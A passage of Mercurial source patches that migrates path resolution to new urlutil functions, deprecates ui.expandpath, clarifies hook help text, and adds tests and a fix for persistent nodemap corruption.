repo, source, opts) - finally: - del repo._subtoppath + return hg.incoming(ui, repo, source, opts) @command( diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1255,7 +1255,14 @@ def _incoming( - displaychlist, subreporecurse, ui, repo, source, opts, buffered=False + displaychlist, + subreporecurse, + ui, + repo, + source, + opts, + buffered=False, + subpath=None, ): """ Helper for incoming / gincoming. @@ -1270,6 +1277,14 @@ msg %= len(srcs) raise error.Abort(msg) source, branches = srcs[0] + if subpath is not None: + subpath = urlutil.url(subpath) + if subpath.isabs(): + source = bytes(subpath) + else: + p = urlutil.url(source) + p.path = os.path.normpath(b'%s/%s' % (p.path, subpath)) + source = bytes(p) other = peer(repo, opts, source) cleanupfn = other.close try: @@ -1297,7 +1312,7 @@ return 0 # exit code is zero since we found incoming changes -def incoming(ui, repo, source, opts): +def incoming(ui, repo, source, opts, subpath=None): def subreporecurse(): ret = 1 if opts.get(b'subrepos'): @@ -1321,7 +1336,9 @@ count += 1 displayer.show(other[n]) - return _incoming(display, subreporecurse, ui, repo, source, opts) + return _incoming( + display, subreporecurse, ui, repo, source, opts, subpath=subpath + ) def _outgoing(ui, repo, dests, opts, subpath=None): diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -882,7 +882,8 @@ opts = copy.copy(opts) opts.pop(b'rev', None) opts.pop(b'branch', None) - return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts) + subpath = subrepoutil.repo_rel_or_abs_source(self._repo) + return hg.incoming(ui, self._repo, source, opts, subpath=subpath) @annotatesubrepoerror def files(self): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618418082 -7200 # Wed Apr 14 18:34:42 2021 +0200 # Node ID 338ab1d89ddb6d528802b98e825fa71ccb8c4a3c # Parent 279df499511e90bafed58f25ca56e0191efbf867 clone: use `get_clone_path` "Surprisingly", the new API is well suited for `hg clone` too. Differential Revision: https://phab.mercurial-scm.org/D10417 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -689,7 +689,7 @@ if dest: ui.status(_(b"destination directory: %s\n") % dest) else: - dest = ui.expandpath(dest) + dest = urlutil.get_clone_path(ui, dest)[0] dest = urlutil.urllocalpath(dest) source = urlutil.urllocalpath(source) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618416145 -7200 # Wed Apr 14 18:02:25 2021 +0200 # Node ID 82366464190abbca9c06cb06ddc7ee4fb6b28fc9 # Parent 338ab1d89ddb6d528802b98e825fa71ccb8c4a3c init: use `get_clone_path` when suitable `hg init` has this weird feature were you can refer to `[paths]` entry select the path to initialize. We move that code to the new APIs. Differential Revision: https://phab.mercurial-scm.org/D10418 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -4376,7 +4376,8 @@ Returns 0 on success. """ opts = pycompat.byteskwargs(opts) - peer = hg.peer(ui, opts, ui.expandpath(dest), create=True) + path = urlutil.get_clone_path(ui, dest)[1] + peer = hg.peer(ui, opts, path, create=True) peer.close() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618418249 -7200 # Wed Apr 14 18:37:29 2021 +0200 # Node ID 394cfc42c05c728be1fcef6dff2be51083f0889b # Parent 82366464190abbca9c06cb06ddc7ee4fb6b28fc9 share: use `get_clone_path` Since `hg share` is mostly like clone, do the same changes there. Differential Revision: https://phab.mercurial-scm.org/D10419 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -305,11 +305,10 @@ if not dest: dest = defaultdest(source) else: - dest = ui.expandpath(dest) + dest = urlutil.get_clone_path(ui, dest)[1] if isinstance(source, bytes): - origsource = ui.expandpath(source) - source, branches = urlutil.parseurl(origsource) + origsource, source, branches = urlutil.get_clone_path(ui, source) srcrepo = repository(ui, source) rev, checkout = addbranchrevs(srcrepo, srcrepo, branches, None) else: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618421448 -7200 # Wed Apr 14 19:30:48 2021 +0200 # Node ID 5d91eeac37ab3b404c936a6c6dba1e5e75359c5f # Parent 394cfc42c05c728be1fcef6dff2be51083f0889b summary: use the new APIs Summary can perform some incoming/outgoing queries (that should be common to the other command with the same needs, but that is another story). We now use the new APIs to do so. The current code behavior is a bit fishy, relying to the fact "default" will be picked as the destination in last resort. I did not altered that, but left various comment to highlight the issue. Differential Revision: https://phab.mercurial-scm.org/D10420 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -7210,7 +7210,12 @@ return def getincoming(): - source, branches = urlutil.parseurl(ui.expandpath(b'default')) + # XXX We should actually skip this if no default is specified, instead + # of passing "default" which will resolve as "./default/" if no default + # path is defined. + source, branches = urlutil.get_unique_pull_path( + b'summary', repo, ui, b'default' + ) sbranch = branches[0] try: other = hg.peer(repo, {}, source) @@ -7233,11 +7238,22 @@ source = sbranch = sother = commoninc = incoming = None def getoutgoing(): - dest, branches = urlutil.parseurl( - ui.expandpath(b'default-push', b'default') - ) - dbranch = branches[0] - revs, checkout = hg.addbranchrevs(repo, repo, branches, None) + # XXX We should actually skip this if no default is specified, instead + # of passing "default" which will resolve as "./default/" if no default + # path is defined. + d = None + if b'default-push' in ui.paths: + d = b'default-push' + elif b'default' in ui.paths: + d = b'default' + if d is not None: + path = urlutil.get_unique_push_path(b'summary', repo, ui, d) + dest = path.pushloc or path.loc + dbranch = path.branch + else: + dest = b'default' + dbranch = None + revs, checkout = hg.addbranchrevs(repo, repo, (dbranch, []), None) if source != dest: try: dother = hg.peer(repo, {}, dest) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618424109 -7200 # Wed Apr 14 20:15:09 2021 +0200 # Node ID 3000f2100711852109d46955eb84efcbb7b063cd # Parent 5d91eeac37ab3b404c936a6c6dba1e5e75359c5f remotefilelog: use `get_unique_pull_path` in `getflogheads` Another command moved to the new API, hooray. Differential Revision: https://phab.mercurial-scm.org/D10421 diff --git a/tests/remotefilelog-getflogheads.py b/tests/remotefilelog-getflogheads.py --- a/tests/remotefilelog-getflogheads.py +++ b/tests/remotefilelog-getflogheads.py @@ -5,6 +5,9 @@ hg, registrar, ) +from mercurial.utils import ( + urlutil, +) cmdtable = {} command = registrar.command(cmdtable) @@ -18,7 +21,7 @@ Used for testing purpose """ - dest = repo.ui.expandpath(b'default') + dest = urlutil.get_unique_pull_path(b'getflogheads', repo, ui)[0] peer = hg.peer(repo, {}, dest) try: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618424471 -7200 # Wed Apr 14 20:21:11 2021 +0200 # Node ID c5c2936f6fb265b9bcc2740a98b1fede1b963d87 # Parent 3000f2100711852109d46955eb84efcbb7b063cd revset: use `get_unique_pull_path` for `remote(…)` This one is also resolving path. For now we restrict the feature to a single destination. This might change in the future. Differential Revision: https://phab.mercurial-scm.org/D10422 diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -2121,8 +2121,11 @@ if len(l) > 1: # i18n: "remote" is a keyword dest = getstring(l[1], _(b"remote requires a repository path")) - dest = repo.ui.expandpath(dest or b'default') - dest, branches = urlutil.parseurl(dest) + if not dest: + dest = b'default' + dest, branches = urlutil.get_unique_pull_path( + b'remote', repo, repo.ui, dest + ) other = hg.peer(repo, {}, dest) n = other.lookup(q) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618426654 -7200 # Wed Apr 14 20:57:34 2021 +0200 # Node ID e7d082e4ace6740024c0d81cc078f25ab63575ea # Parent c5c2936f6fb265b9bcc2740a98b1fede1b963d87 dispatch: use the new API to resolve --repository An even weirder feature of Mercurial is the ability to use `[paths]` alias as value of `--repository`. The weird feature now use the new APIs. Differential Revision: https://phab.mercurial-scm.org/D10424 diff --git a/mercurial/dispatch.py b/mercurial/dispatch.py --- a/mercurial/dispatch.py +++ b/mercurial/dispatch.py @@ -50,6 +50,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -990,7 +991,7 @@ lui.readconfig(os.path.join(path, b".hg", b"hgrc-not-shared"), path) if rpath: - path = lui.expandpath(rpath) + path = urlutil.get_clone_path(lui, rpath)[0] lui = ui.copy() if rcutil.use_repo_hgrc(): _readsharedsourceconfig(lui, path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618426958 -7200 # Wed Apr 14 21:02:38 2021 +0200 # Node ID 5a6a1cd21f0952dcd8bc0e18c80759b6801b039e # Parent e7d082e4ace6740024c0d81cc078f25ab63575ea profiling: use `util.expandpath` instead of `ui.expandpath` for output Given we are talking about the path to an output file, I am fairly certain that the initial author meant to expand `~` and the like and not to resolve entry from `[paths]`. Differential Revision: https://phab.mercurial-scm.org/D10425 diff --git a/mercurial/profiling.py b/mercurial/profiling.py --- a/mercurial/profiling.py +++ b/mercurial/profiling.py @@ -228,7 +228,7 @@ if self._output == b'blackbox': self._fp = util.stringio() elif self._output: - path = self._ui.expandpath(self._output) + path = util.expandpath(self._output) self._fp = open(path, b'wb') elif pycompat.iswindows: # parse escape sequence by win32print() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618427499 -7200 # Wed Apr 14 21:11:39 2021 +0200 # Node ID 9e021cffb3566e501aacc9bf72d4a1e1704ddecf # Parent 5a6a1cd21f0952dcd8bc0e18c80759b6801b039e debugdiscovery: use `get_unique_pull_path` Lets move this code to the new API. Differential Revision: https://phab.mercurial-scm.org/D10426 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -1060,7 +1060,9 @@ if not remote_revs: - remoteurl, branches = urlutil.parseurl(ui.expandpath(remoteurl)) + remoteurl, branches = urlutil.get_unique_pull_path( + b'debugdiscovery', repo, ui, remoteurl + ) remote = hg.peer(repo, opts, remoteurl) ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) else: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618427722 -7200 # Wed Apr 14 21:15:22 2021 +0200 # Node ID 69359c91dc4303460020ed0c1edf475a02a6b186 # Parent 9e021cffb3566e501aacc9bf72d4a1e1704ddecf debugssl: use `get_unique_pull_path` Let's move this code to the new API. Differential Revision: https://phab.mercurial-scm.org/D10427 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3654,7 +3654,9 @@ ) source = b"default" - source, branches = urlutil.parseurl(ui.expandpath(source)) + source, branches = urlutil.get_unique_pull_path( + b'debugssl', repo, ui, source + ) url = urlutil.url(source) defaultport = {b'https': 443, b'ssh': 22} # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618427753 -7200 # Wed Apr 14 21:15:53 2021 +0200 # Node ID d7b36a4e03dec3a946ca8c1a0f6d4de96826cbc1 # Parent 69359c91dc4303460020ed0c1edf475a02a6b186 debugbackupbundle: use `get_unique_pull_path` This is the last known user of `ui.expandpath` outside of `urlutil`. Hooray. Differential Revision: https://phab.mercurial-scm.org/D10428 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -3765,8 +3765,14 @@ for backup in backups: # Much of this is copied from the hg incoming logic - source = ui.expandpath(os.path.relpath(backup, encoding.getcwd())) - source, branches = urlutil.parseurl(source, opts.get(b"branch")) + source = os.path.relpath(backup, encoding.getcwd()) + source, branches = urlutil.get_unique_pull_path( + b'debugbackupbundle', + repo, + ui, + source, + default_branches=opts.get(b'branch'), + ) try: other = hg.peer(repo, opts, source) except error.LookupError as ex: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618428058 -7200 # Wed Apr 14 21:20:58 2021 +0200 # Node ID afdd7c472ef2188035b2354d710373b2ae8cd1da # Parent d7b36a4e03dec3a946ca8c1a0f6d4de96826cbc1 urlutil: remove usage of `ui.expandpath` in `get_pull_paths` We want to deprecate `ui.expandpath` and simplify the code before adding more complexity in the form of `[paths]` entry pointing to multiple url. So we inline the relevant bits. Differential Revision: https://phab.mercurial-scm.org/D10429 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -467,7 +467,15 @@ if not sources: sources = [b'default'] for source in sources: - url = ui.expandpath(source) + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source yield parseurl(url, default_branches) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618428420 -7200 # Wed Apr 14 21:27:00 2021 +0200 # Node ID 0d8541e53e466e344f4bf4652fc88d44041bdbf0 # Parent afdd7c472ef2188035b2354d710373b2ae8cd1da urlutil: remove usage of `ui.expandpath` in `get_unique_pull_path` We want to deprecate `ui.expandpath` and simplify the code before adding more complexity in the form of `[paths]` entry pointing to multiple url. So we inline the relevant bits. Differential Revision: https://phab.mercurial-scm.org/D10430 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -509,8 +509,22 @@ The `action` parameter will be used for the error message. """ if source is None: - source = b'default' - url = ui.expandpath(source) + if b'default' in ui.paths: + url = ui.paths[b'default'].rawloc + else: + # XXX this is the historical default behavior, but that is not + # great, consider breaking BC on this. + url = b'default' + else: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source return parseurl(url, default_branches) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618428567 -7200 # Wed Apr 14 21:29:27 2021 +0200 # Node ID 221f8585e9857c7babbaddcb387526011476f311 # Parent 0d8541e53e466e344f4bf4652fc88d44041bdbf0 urlutil: remove usage of `ui.expandpath` in `get_clone_path` We want to deprecate `ui.expandpath` and simplify the code before adding more complexity in the form of `[paths]` entry pointing to multiple url. So we inline the relevant bits. Differential Revision: https://phab.mercurial-scm.org/D10431 diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -530,9 +530,25 @@ def get_clone_path(ui, source, default_branches=()): """return the `(origsource, path, branch)` selected as clone source""" - url = ui.expandpath(source) - path, branch = parseurl(url, default_branches) - return url, path, branch + if source is None: + if b'default' in ui.paths: + url = ui.paths[b'default'].rawloc + else: + # XXX this is the historical default behavior, but that is not + # great, consider breaking BC on this. + url = b'default' + else: + if source in ui.paths: + url = ui.paths[source].rawloc + else: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + url = path(ui, None, rawloc=source).rawloc + except ValueError: + url = source + clone_path, branch = parseurl(url, default_branches) + return url, clone_path, branch def parseurl(path, branches=None): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618441392 -7200 # Thu Apr 15 01:03:12 2021 +0200 # Node ID b03527bdac011ba47a4f5e914ecc32019d30b9b8 # Parent 221f8585e9857c7babbaddcb387526011476f311 ui: deprecated `ui.expandpath` This function return a single path, something incompatible with the coming change to `[paths]` definition to allow multiple associated urls. Now that all user got migrated, we deprecate the function. Differential Revision: https://phab.mercurial-scm.org/D10432 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -1030,6 +1030,8 @@ def expandpath(self, loc, default=None): """Return repository location relative to cwd or from [paths]""" + msg = b'ui.expandpath is deprecated, use `get_*` functions from urlutil' + self.deprecwarn(msg, b'6.0') try: p = self.getpath(loc) if p: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618473552 -7200 # Thu Apr 15 09:59:12 2021 +0200 # Node ID 1e2f2c782928014c347d3706fbcd61758118de7f # Parent b03527bdac011ba47a4f5e914ecc32019d30b9b8 revset: drop an outdated comment There is not `ui.expandpath` call there anymore. Differential Revision: https://phab.mercurial-scm.org/D10435 diff --git a/mercurial/revset.py b/mercurial/revset.py --- a/mercurial/revset.py +++ b/mercurial/revset.py @@ -1856,7 +1856,6 @@ l and getstring(l[0], _(b"outgoing requires a repository path")) or b'' ) if dest: - # ui.getpath() explicitly tests for None, not just a boolean dests = [dest] else: dests = [] # HG changeset patch # User Aay Jay Chan <aayjaychan@itopia.com.hk> # Date 1617288235 -28800 # Thu Apr 01 22:43:55 2021 +0800 # Node ID 314386a19cffb37e6c96161ac230cada9eee06b3 # Parent 1e2f2c782928014c347d3706fbcd61758118de7f help: prepend environment variables used in hooks with "$" Most of them have "$" prefix but some don't, so adding it for consistency. Differential Revision: https://phab.mercurial-scm.org/D10398 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1151,7 +1151,7 @@ ``pretxnopen`` Run before any new repository transaction is open. The reason for the transaction will be in ``$HG_TXNNAME``, and a unique identifier for the - transaction will be in ``HG_TXNID``. A non-zero status will prevent the + transaction will be in ``$HG_TXNID``. A non-zero status will prevent the transaction from being opened. ``pretxnclose`` @@ -1160,12 +1160,12 @@ content or change it. Exit status 0 allows the commit to proceed. A non-zero status will cause the transaction to be rolled back. The reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for - the transaction will be in ``HG_TXNID``. The rest of the available data will + the transaction will be in ``$HG_TXNID``. The rest of the available data will vary according the transaction type. New changesets will add ``$HG_NODE`` (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and - phase changes will set ``HG_BOOKMARK_MOVED`` and ``HG_PHASES_MOVED`` to ``1`` - respectively, etc. + phase changes will set ``$HG_BOOKMARK_MOVED`` and ``$HG_PHASES_MOVED`` to + ``1`` respectively, etc. ``pretxnclose-bookmark`` Run right before a bookmark change is actually finalized. Any repository @@ -1179,7 +1179,7 @@ will be empty. In addition, the reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in - ``HG_TXNID``. + ``$HG_TXNID``. ``pretxnclose-phase`` Run right before a phase change is actually finalized. Any repository change @@ -1191,7 +1191,7 @@ while the previous ``$HG_OLDPHASE``. In case of new node, ``$HG_OLDPHASE`` will be empty. In addition, the reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in - ``HG_TXNID``. The hook is also run for newly added revisions. In this case + ``$HG_TXNID``. The hook is also run for newly added revisions. In this case the ``$HG_OLDPHASE`` entry will be empty. ``txnclose`` # HG changeset patch # User Aay Jay Chan <aayjaychan@itopia.com.hk> # Date 1617603557 -28800 # Mon Apr 05 14:19:17 2021 +0800 # Node ID 2c843ad6852812eb1de9be7f1a03c81c631866d3 # Parent 314386a19cffb37e6c96161ac230cada9eee06b3 help: document `$HG_NEW_OBSMARKERS` in pretxnclose hook Differential Revision: https://phab.mercurial-scm.org/D10399 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1165,7 +1165,8 @@ (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and phase changes will set ``$HG_BOOKMARK_MOVED`` and ``$HG_PHASES_MOVED`` to - ``1`` respectively, etc. + ``1`` respectively. The number of new obsmarkers, if any, will be in + ``$HG_NEW_OBSMARKERS``, etc. ``pretxnclose-bookmark`` Run right before a bookmark change is actually finalized. Any repository # HG changeset patch # User Matt Harbison <matt_harbison@yahoo.com> # Date 1618633701 14400 # Sat Apr 17 00:28:21 2021 -0400 # Node ID d9531094cf8ef7098a2120160e22ad33acb7709f # Parent 2c843ad6852812eb1de9be7f1a03c81c631866d3 cmdutil: fix an uninitialize variable usage in clearunfinished() I happened to notice that PyCharm flagged this while looking for something else. I'm pretty sure it meant to check the current state in the iteration, and not keep reusing the last one in the previous iteration. Differential Revision: https://phab.mercurial-scm.org/D10459 diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -3776,7 +3776,7 @@ raise error.StateError(state.msg(), hint=state.hint()) for s in statemod._unfinishedstates: - if s._opname == b'merge' or state._reportonly: + if s._opname == b'merge' or s._reportonly: continue if s._clearable and s.isunfinished(repo): util.unlink(repo.vfs.join(s._fname)) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618577953 -7200 # Fri Apr 16 14:59:13 2021 +0200 # Node ID 99aed233aa8d873f6f2e3249b7e086a9df9227b6 # Parent d9531094cf8ef7098a2120160e22ad33acb7709f nodemap: test various corruption scenario for the persistent nodemap Corruption can happens in the wild, either because some of our code is buggy or because repository were shared/transfered in a strange manners. Currently one of the corruption case (not enough data) lead to a crash. We add explicit tests for theses cases. Differential Revision: https://phab.mercurial-scm.org/D10457 diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -747,6 +747,63 @@ data-unused: 0 data-unused: 0.000% +Test various corruption case +============================ + +Missing datafile +---------------- + +Test behavior with a missing datafile + + $ hg clone --quiet --pull test-repo corruption-test-repo + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog-*.nd (glob) + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + $ rm corruption-test-repo/.hg/store/00changelog*.nd + $ hg log -R corruption-test-repo -r . + changeset: 5005:90d5d3ba2fc4 + tag: tip + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a2 + + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + +Truncated data file +------------------- + +Test behavior with a too short datafile + +rebuild the missing data + $ hg -R corruption-test-repo debugupdatecache + $ ls -1 corruption-test-repo/.hg/store/00changelog* + corruption-test-repo/.hg/store/00changelog-*.nd (glob) + corruption-test-repo/.hg/store/00changelog.d + corruption-test-repo/.hg/store/00changelog.i + corruption-test-repo/.hg/store/00changelog.n + +truncate the file + + $ datafilepath=`ls corruption-test-repo/.hg/store/00changelog*.nd` + $ f -s $datafilepath + corruption-test-repo/.hg/store/00changelog-*.nd: size=121088 (glob) + $ dd if=$datafilepath bs=1000 count=10 of=$datafilepath-tmp status=none + $ mv $datafilepath-tmp $datafilepath + $ f -s $datafilepath + corruption-test-repo/.hg/store/00changelog-*.nd: size=10000 (glob) + +Check that Mercurial reaction to this event + + $ hg -R corruption-test-repo log -r . + abort: index 00changelog.i is corrupted + [50] + + stream clone ------------ # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618580340 -7200 # Fri Apr 16 15:39:00 2021 +0200 # Node ID a3720569a43fe0be36cf15d69060e423545200d5 # Parent 99aed233aa8d873f6f2e3249b7e086a9df9227b6 nodemap: deal with data mmap error If the file is too small, the mmapread call would raise a ValueError. We catch that and ignore nodemap content (as we do without mmap). This make the repository slightly slower (until the next write) but usable. Unlike the current crash. Differential Revision: https://phab.mercurial-scm.org/D10458 diff --git a/mercurial/revlogutils/nodemap.py b/mercurial/revlogutils/nodemap.py --- a/mercurial/revlogutils/nodemap.py +++ b/mercurial/revlogutils/nodemap.py @@ -53,7 +53,11 @@ try: with revlog.opener(filename) as fd: if use_mmap: - data = util.buffer(util.mmapread(fd, data_length)) + try: + data = util.buffer(util.mmapread(fd, data_length)) + except ValueError: + # raised when the read file is too small + data = b'' else: data = fd.read(data_length) except (IOError, OSError) as e: diff --git a/tests/test-persistent-nodemap.t b/tests/test-persistent-nodemap.t --- a/tests/test-persistent-nodemap.t +++ b/tests/test-persistent-nodemap.t @@ -799,9 +799,13 @@ Check that Mercurial reaction to this event - $ hg -R corruption-test-repo log -r . - abort: index 00changelog.i is corrupted - [50] + $ hg -R corruption-test-repo log -r . --traceback + changeset: 5005:90d5d3ba2fc4 + tag: tip + user: test + date: Thu Jan 01 00:00:00 1970 +0000 + summary: a2 + stream clone # HG changeset patch # User Aay Jay Chan <aayjaychan@itopia.com.hk> # Date 1618331905 -28800 # Wed Apr 14 00:38:25 2021 +0800 # Node ID 6904a9f33b302c9d1cf3625e438cc63e8133d562 # Parent a3720569a43fe0be36cf15d69060e423545200d5 help: clarify when `$HG_URL` and `$HG_SOURCE` are added in hooks Differential Revision: https://phab.mercurial-scm.org/D10400 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1161,12 +1161,12 @@ status will cause the transaction to be rolled back. The reason for the transaction opening will be in ``$HG_TXNNAME``, and a unique identifier for the transaction will be in ``$HG_TXNID``. The rest of the available data will - vary according the transaction type. New changesets will add ``$HG_NODE`` - (the ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last - added changeset), ``$HG_URL`` and ``$HG_SOURCE`` variables. Bookmark and - phase changes will set ``$HG_BOOKMARK_MOVED`` and ``$HG_PHASES_MOVED`` to - ``1`` respectively. The number of new obsmarkers, if any, will be in - ``$HG_NEW_OBSMARKERS``, etc. + vary according the transaction type. Changes unbundled to the repository will + add ``$HG_URL`` and ``$HG_SOURCE``. New changesets will add ``$HG_NODE`` (the + ID of the first added changeset), ``$HG_NODE_LAST`` (the ID of the last added + changeset). Bookmark and phase changes will set ``$HG_BOOKMARK_MOVED`` and + ``$HG_PHASES_MOVED`` to ``1`` respectively. The number of new obsmarkers, if + any, will be in ``$HG_NEW_OBSMARKERS``, etc. ``pretxnclose-bookmark`` Run right before a bookmark change is actually finalized. Any repository # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618425173 -7200 # Wed Apr 14 20:32:53 2021 +0200 # Node ID 92029a43debb707cc2dbbe7dd0d95d6dbb833f2b # Parent 6904a9f33b302c9d1cf3625e438cc63e8133d562 perf-discovery: use `get_unique_pull_path` This performance command now use the new API, unless the benchmarked Mercurial is older. Differential Revision: https://phab.mercurial-scm.org/D10423 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -915,7 +915,13 @@ """benchmark discovery between local repo and the peer at given path""" repos = [repo, None] timer, fm = gettimer(ui, opts) - path = ui.expandpath(path) + + try: + from mercurial.utils.urlutil import get_unique_pull_path + + path = get_unique_pull_path(b'perfdiscovery', repo, ui, path)[0] + except ImportError: + path = ui.expandpath(path) def s(): repos[1] = hg.peer(ui, opts, path) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618145 -7200 # Mon Apr 05 12:22:25 2021 +0200 # Node ID 3c9208702db39a61f049f68dbe186acae79ee6f5 # Parent 92029a43debb707cc2dbbe7dd0d95d6dbb833f2b revlog: replace revlog._io.size with a new revlog.index.entry_size The `revlogio` class is mostly a relic from the past. Once in charge of the full revlog related Input/Output code, that class gradually lost responsibilities to the point where more IO are now done by `revlog.index` objects or revlog objects themself. I would like to ultimately remove the `revlogio` class, to do so I start simple with move the "entry size" information on the index. (The index is already responsible of the binary unpacking, so it knows the size. Differential Revision: https://phab.mercurial-scm.org/D10309 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -3228,7 +3228,10 @@ start = r.start length = r.length inline = r._inline - iosize = r._io.size + try: + iosize = r.index.entry_size + except AttributeError: + iosize = r._io.size buffer = util.buffer chunks = [] diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -15,6 +15,7 @@ #include <stddef.h> #include <stdlib.h> #include <string.h> +#include <structmember.h> #include "bitmanipulation.h" #include "charencode.h" @@ -2866,6 +2867,12 @@ {NULL} /* Sentinel */ }; +static PyMemberDef index_members[] = { + {"entry_size", T_LONG, offsetof(indexObject, hdrsize), 0, + "size of an index entry"}, + {NULL} /* Sentinel */ +}; + PyTypeObject HgRevlogIndex_Type = { PyVarObject_HEAD_INIT(NULL, 0) /* header */ "parsers.index", /* tp_name */ @@ -2895,7 +2902,7 @@ 0, /* tp_iter */ 0, /* tp_iternext */ index_methods, /* tp_methods */ - 0, /* tp_members */ + index_members, /* tp_members */ index_getset, /* tp_getset */ 0, /* tp_base */ 0, /* tp_dict */ diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -49,11 +49,13 @@ big_int_size = struct.calcsize(b'>Q') # Size of a C long int, platform independent int_size = struct.calcsize(b'>i') - # Size of the entire index format - index_size = revlog_constants.INDEX_ENTRY_V1.size # An empty index entry, used as a default value to be overridden, or nullrev null_item = (0, 0, 0, -1, -1, -1, -1, nullid) + @util.propertycache + def entry_size(self): + return self.index_format.size + @property def nodemap(self): msg = b"index.nodemap is deprecated, use index.[has_node|rev|get_rev]" @@ -116,7 +118,7 @@ data = self._extra[i - self._lgt] else: index = self._calculate_index(i) - data = self._data[index : index + self.index_size] + data = 